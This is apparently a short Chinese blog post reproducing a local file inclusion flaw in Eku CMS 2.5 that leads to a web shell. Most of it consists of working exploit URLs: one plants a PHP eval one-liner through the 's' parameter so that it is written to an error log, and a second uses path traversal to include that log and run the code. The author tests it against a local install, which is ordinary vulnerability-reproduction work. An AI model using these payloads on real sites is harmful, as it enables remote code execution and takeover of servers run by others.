易酷 cms2.5 本地文件包含漏洞 getshell

易酷 cms2.5  本地文件包含漏洞 getshell

首先下载源码安装(http://127.0.0.1/test/ekucms2.5/install.php)

 安装成功直接进行复现吧

本地包含一句话木马

http://127.0.0.1/test/ekucms2.5/?s=my/show/id/{~eval($_POST[orange])}

 

 

会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日

错误日志内容

 

进行包含错误日志,地址:

http://127.0.0.1/test/ekucms2.5/?s=my/show/id/\..\temp\logs\18_04_18.log

 

 

验证下:

 

 

源码链接(链接: https://pan.baidu.com/s/1K8dmimbrqO41tNemhnKeAQ 密码: 3y48)

 

posted on 2018-04-18 12:32  Oran9e  阅读(1686)  评论(0编辑  收藏  举报